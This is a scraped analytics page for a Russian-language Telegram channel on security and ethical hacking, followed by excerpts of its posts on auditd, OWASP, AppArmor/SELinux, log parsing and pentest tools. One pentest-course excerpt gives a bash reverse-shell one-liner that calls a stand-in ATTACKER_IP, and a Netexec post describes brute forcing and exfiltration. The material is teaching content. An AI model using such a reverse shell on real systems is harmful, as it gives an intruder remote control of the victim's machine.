CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Больше📈 Аналитический обзор Telegram-канала CodeGuard: PySec Edition
Канал CodeGuard: PySec Edition является активным участником. Сейчас сообщество объединяет 14 173 подписчиков, занимая 8 752 место в категории Технологии и приложения и 45 689 место в регионе Россия.
📊 Показатели аудитории и динамика
С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 173 подписчиков.
Согласно последним данным от 28 сентября, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 820, а за последние 24 часа — 28, при этом общий охват остаётся высоким.
- Статус верификации: Не верифицирован
- Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 9.75%. В первые 24 часа после публикации контент обычно набирает 5.54% реакций от общего числа подписчиков.
- Охват публикаций: В среднем каждый пост получает 1 377 просмотров. В течение первых суток публикация набирает 782 просмотров.
- Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 7.
- Тематические интересы: Контент сосредоточен на ключевых темах, таких как codeguard, pysec, docker, grep, контейнер.
📝 Описание и контентная политика
Автор описывает ресурс как площадку для выражения субъективного мнения:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Благодаря высокой частоте обновлений (последние данные получены 29 сентября, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.
➡️Введение и работа с терминалом ➡️ Криптография ➡️ Сети ➡️ Стеганография ➡️ Разведка по открытым источникам (OSINT) ➡️ Компьютерная криминалистика ➡️ Обратная разработка📚 26 уроков, 42 минуты видео и 60 тестов — видно что делали, как могли)) Курс подходит студентам и всем, кто хочет освоить базовые навыки информационной безопасности и подготовиться к CTF-соревнованиям. ➡️ Курс по CTF на Stepik ⭐️ CodeGuard | #CTF #stepik #infosec #pentest
О чём эта статья? — Фундамент: как правильно путями в rsync и почему слеш в конце решает всё. — Три основных режима работы: локально, с сервером и между серверами. — Разбор «волшебного» флага -a: что скрывается под капотом. — Главные опции: как сделать вывод подробным, а работу — безопасной. — Синхронизация поверх SSH: работа с нестандартными портами. — Самые опасные «грабли» и как их избежать.😎Можно глянуть позже 😈 CodeGuard | #linux
Кратко по главному: 🔸Инъекции (SQL, XSS и пр.) — фильтруйте и используйте подготовленные запросы 🔸 Поломанная аутентификация — внедряйте многофакторную аутентификацию (MFA) 🔸 Разглашение данных — шифруйте и храните данные правильно 🔸 Нарушение контроля доступа — проверяйте права на стороне сервера 🔸 Небезопасная конфигурация — закройте ненужные порты и обновляйте ПО 🔸 Устаревшие компоненты — следите за обновлениями 🔸 Ошибки идентификации — ограничивайте попытки входа и применяйте MFA 🔸 Целостность ПО — проверяйте цифровые подписи и хэшируйте 🔸 Логирование и мониторинг — ведите логи и анализируйте их 🔸 SSRF — фильтруйте доступ к внутренним ресурсамПонимайте угрозы, применяйте защиту — и ваш софт станет крепким щитом против атак. ⭐️ Примеры и разбор здесь ⭐️ CodeGuard | #OWASP #WebSecurity
sudo apt-get install auditd
sudo systemctl start auditd
sudo systemctl enable auditd
⭐️ Шаг 2. Создаём правило аудита открытия SSH-сессий
Следим за запуском sshd и выполнением команд через системные вызовы:
sudo auditctl -a exit,always -F arch=b64 -S execve -F path=/usr/sbin/sshd -k ssh-session
И для 32-битных систем:
sudo auditctl -a exit,always -F arch=b32 -S execve -F path=/usr/sbin/sshd -k ssh-session
⚙️ Шаг 3. Аудит изменений важных файлов SSH
Например, контролируем изменения конфигурации sshd:
sudo auditctl -w /etc/ssh/sshd_config -p wa -k ssh-config
-w — путь к файлу
-p wa — наблюдать за записью и атрибутами
-k — тег для удобства поиска
📊Шаг 4. Просмотр и фильтрация логов с помощью ausearch
Ищем логи с тегом ssh-session:
sudo ausearch -k ssh-session -i
Опция -i форматирует вывод в читаемый вид.
Или события с изменениями конфигурации:
sudo ausearch -k ssh-config -i
🦜 Шаг 5. Можно искать записи за конкретное время:
sudo ausearch -k ssh-session --start today -i
💡Рекомендация:
- Для постоянных правил добавляйте их в /etc/audit/audit.rules или /etc/audit/rules.d/
- Используйте aureport для генерации сводных отчётов
- Помните о производительности — не ставьте правил слишком много
auditd с ausearch — это серьёзный инструмент для контроля всей активности по SSH и безопасности. Идеально подходит для расследования инцидентов и аудита пользователей.
😈 CodeGuard | #auditd #ausearch #SSHЧто вы узнаете: ⚫️Как организована сеть — какие бывают устройства, от свитчей до маршрутизаторов ⚫️ Основы протоколов передачи данных — TCP, UDP, IP и другие ⚫️ Разбор сетевая модель OSI и TCP/IP — базовые уровни, их задачи и взаимодействие ⚫️ Инструменты анализа сетевой активности (Wireshark и другие) ⚫️ Фреймворки для пентеста и сетевые средства защитыЧто реально круто — объяснения простые, с практическими примерами. Обязательно посмотрите, если ищете фундаментальное понимание современных сетей! Для закрепления — домашка )) 😈 CodeGuard | #OSI #TCPIP #Wireshark
Основные возможности: Перебор паролей и учетных записей для обнаружения слабых логинов Проверка валидности найденных учетных данных Удаленное выполнение команд для разведки системы и окружения Передача файлов — заливка payload и сбор данных (эксфильтрация)Netexec интегрирован с MITRE ATT&CK, что позволяет моделировать реальные атаки с целью выявления уязвимостей, но при этом действия остаются контролируемыми и обратимыми. Основной риск — слабые пароли и плохо настроенные SSH сервисы, открывающие путь к полному компромиссу системы.
Рекомендуется: - Использовать ключевую аутентификацию вместо паролей - Внедрять многофакторную аутентификацию (MFA) - Ограничивать доступ по IP и логировать действия - Применять защиту от brute force (fail2ban, rate limiting)Руководство по эксплуатации SSH через Netexec поможет лучше понять риски и повысить безопасность ваших систем. 😈 CodeGuard | #security #pentest
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
Этот код запускает обратное соединение с атакующим, позволяя контролировать машину через командную строку.
🖥 Часть 4 в Архиве — последний пост
⭐️ CodeGuard | Chat | #pentest #kali #coursegrep 'postfix/' /var/log/mail.log | grep 'status=bounced'
Выведет все письма с ошибками доставки — часто это источник проблем.
⚙️ Автоматизация и хранение - Ежедневная обработка логов перед ротацией — сохраняйте нужную статистику в БД - Настройка оповещений на повторяющиеся ошибки - Анализ тем писем, IP отправителей и т.п. для выявления массированных атак➡️ Дальнейшее чтение — подробный разбор логов и генерация отчетов Парсинг логов — лучший способ следить за почтовой системой и быть на шаг впереди злоумышленников. 😈 CodeGuard | #Postfix #emailsecurity #bash
sudo aa-status
Включение и запуск:
sudo systemctl enable --now apparmor
🔹 Основные команды AppArmor:
- Просмотр профилей:
sudo aa-status
- Перевод в режим жалоб (Complain) для отладки:
sudo aa-complain /path/to/profile
- Включение жесткого режима (Enforce):
sudo aa-enforce /path/to/profile
- Просмотр логов для диагностики:
journalctl -e | grep apparmor
🔹 Проверка статуса SELinux:
sestatus
Изменение режима (например, включение enforce):
sudo setenforce 1
Постоянное изменение в конфиге:
sudo nano /etc/selinux/config
# Измените SELINUX=enforcing
⚙️ Пример базового скрипта для включения AppArmor и SELinux:
#!/bin/bash
sudo systemctl enable --now apparmor
sudo aa-status
sudo setenforce 1
sestatus
✅ Практические советы:
- AppArmor проще и идеален для новичков или Ubuntu/Debian-систем.
- SELinux требует больше обучения, зато предлагает детальный контроль доступа.
- Для новых профилей используйте режим complain в AppArmor для отладки.
- Читайте логи для понимания блокируемых действий и настройки разрешений.
AppArmor и SELinux — ключевые инструменты для повышения защиты Linux, заставляющие процессы работать строго по правилам доступа. Начните с простого и развивайте навыки системной безопасности!
😈 CodeGuard | #AppArmor #SELinux #bash #securityЭта статья — не просто теоретический обзор. Это пошаговое, выстраданное на практике руководство по внедрению JEA в реальной продакшен-среде на Windows Server 2019/2022. Мы пройдем весь путь: от понимания фундаментальных принципов до создания, развертывания и использования защищенных конечных точек (endpoints), решая по пути реальные проблемы.📖 Читать дальше 😈 CodeGuard | #Windows #PowerShell #sysadmin
